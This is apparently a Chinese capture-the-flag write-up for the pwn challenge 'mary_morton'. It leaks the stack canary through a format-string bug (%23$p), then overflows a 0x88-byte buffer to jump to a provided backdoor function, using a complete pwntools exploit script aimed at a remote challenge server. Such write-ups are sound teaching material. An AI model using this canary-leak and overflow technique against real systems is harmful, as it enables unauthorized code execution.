mary_morton

这道题开启了canary保护，大概说一下题目，就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出，这道题思路就是通过格式化字符漏洞泄露出cannary的值，然后进行栈溢出，后门题目已经给了。

来算算偏移量吧，buf为rbp-90h,canary就是v2为rbp-8h，所以偏移量为88h，然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下，输了个aaaaaaaaaaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x，然后得到aaaaaaaaaaaa.74451f60.0000007f.c4a83081.00000000.00000000.61616161.61616161.30252e78，显然得到偏移为6个字节，然后就可以写代码了。

from pwn import *

p=remote('111.198.29.45',59592)
system=0x4008De
p.recvuntil('3. Exit the battle')
p.sendline('2')
p.sendline('%23$p')
canary=int (p.recvuntil('1.')[:-2],16)
print(canary)
p.recvuntil('3. Exit the battle')
p.sendline('1')
payload=0x88*'a'+p64(canary)+p64(0xdeadbeef)+p64(system)
p.sendline(payload)

p.interactive()